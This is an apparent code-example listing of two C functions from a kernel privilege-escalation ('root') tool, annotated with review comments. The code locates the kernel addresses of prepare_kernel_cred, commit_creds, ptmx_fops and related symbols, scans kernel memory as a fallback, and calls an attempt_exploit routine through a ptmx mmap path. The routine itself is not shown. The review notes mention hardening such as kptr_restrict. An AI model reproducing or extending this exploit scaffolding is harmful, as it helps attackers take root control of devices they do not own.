Пример #1
/*
 * Resolve the kernel addresses the rest of this tool relies on.
 *
 * The five setup_*_address() helpers are called first; if
 * has_all_essential_addresses() is then satisfied the function succeeds
 * immediately.  Otherwise find_variables_in_memory is run through
 * run_with_mmap(), and through run_with_memcpy() when the mmap path
 * reports failure, after which the check is repeated.
 *
 * Returns true when has_all_essential_addresses() passes, false otherwise.
 * On failure one line is printed for each of the five globals that is
 * still zero/NULL.
 *
 * NOTE(review): the setup_* helpers and the globals tested below are
 * defined outside this listing; presumably each helper fills in the
 * global of the same name -- confirm against the rest of the file.
 * NOTE(review): from a hardening point of view, every lookup here depends
 * on an unprivileged process learning kernel addresses or reading kernel
 * memory; restricting kernel pointer exposure (e.g. kptr_restrict) and
 * patching the underlying memory-access flaw is what makes this function
 * return false.
 */
static bool
setup_variables(void)
{
  /* Initial lookups; results are inspected through the globals. */
  setup_prepare_kernel_cred_address();
  setup_commit_creds_address();
  setup_remap_pfn_range_address();
  setup_vmalloc_exec_address();
  setup_ptmx_fops_address();

  if (!has_all_essential_addresses()) {
    /* Fallback: scan memory, preferring the mmap path over memcpy. */
    printf("Try to find address in memory...\n");
    if (!run_with_mmap(find_variables_in_memory)) {
      printf("\n");
      /* Return value is not needed: the re-check below decides. */
      run_with_memcpy(find_variables_in_memory);
    }

    if (!has_all_essential_addresses()) {
      /* Tell the user exactly which addresses are still unresolved. */
      if (!prepare_kernel_cred)
        printf("Failed to get prepare_kernel_cred address.\n");

      if (!commit_creds)
        printf("Failed to get commit_creds address.\n");

      if (!remap_pfn_range)
        printf("Failed to get remap_pfn_range address.\n");

      if (!vmalloc_exec)
        printf("Failed to get vmalloc_exec address.\n");

      if (!ptmx_fops)
        printf("Failed to get ptmx_fops address.\n");

      return false;
    }
  }

  return true;
}
Пример #2
/*
 * Run `callback` through the mmap-based path.
 *
 * run_exploit_mmap() is tried first; when it returns non-zero, the value
 * it stored through its second argument is returned as-is.  Otherwise the
 * function needs three things before it hands over to attempt_exploit():
 *   - remap_pfn_range (via setup_remap_pfn_range_address()),
 *   - ptmx_fops_mmap_address (via setup_ptmx_fops_mmap_address()),
 *   - the kernel physical offset, taken from the device symbol table or,
 *     when that lookup yields 0, from detect_kernel_phys_parameters().
 * If any of them cannot be obtained a message is printed and false is
 * returned.
 *
 * Returns whatever attempt_exploit() returns on the final path.
 *
 * NOTE(review): what attempt_exploit() does with ptmx_fops_mmap_address
 * and the ptmx_mmap handler is not visible in this listing.
 * NOTE(review): the 0x00008000 adjustment looks like a fixed image offset
 * from the physical base -- confirm; the subtraction is unsigned and is
 * not guarded against a symbol value smaller than the constant.
 */
bool
run_with_mmap(memory_callback_t callback)
{
  const unsigned long int offset_adjust = 0x00008000;
  unsigned long int kernel_physical_offset;
  bool mmap_result;

  /* Preferred path: if it handled the request, its verdict is final. */
  if (run_exploit_mmap(callback, &mmap_result))
    return mmap_result;

  setup_remap_pfn_range_address();
  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    return false;
  }

  setup_ptmx_fops_mmap_address();
  if (!ptmx_fops_mmap_address) {
    printf("You need to manage to get ptmx_fops addresses.\n");
    return false;
  }

  kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (!kernel_physical_offset) {
    /* No database entry for this device: fall back to detection. */
    if (!detect_kernel_phys_parameters()) {
      printf("You need to manage to get kernel_physical_offset addresses.\n");
      return false;
    }
  }
  else {
    set_kernel_phys_offset(kernel_physical_offset - offset_adjust);
  }

  return attempt_exploit(ptmx_fops_mmap_address,
                         (unsigned long int)&ptmx_mmap, 0,
                         run_callback_with_mmap, callback);
}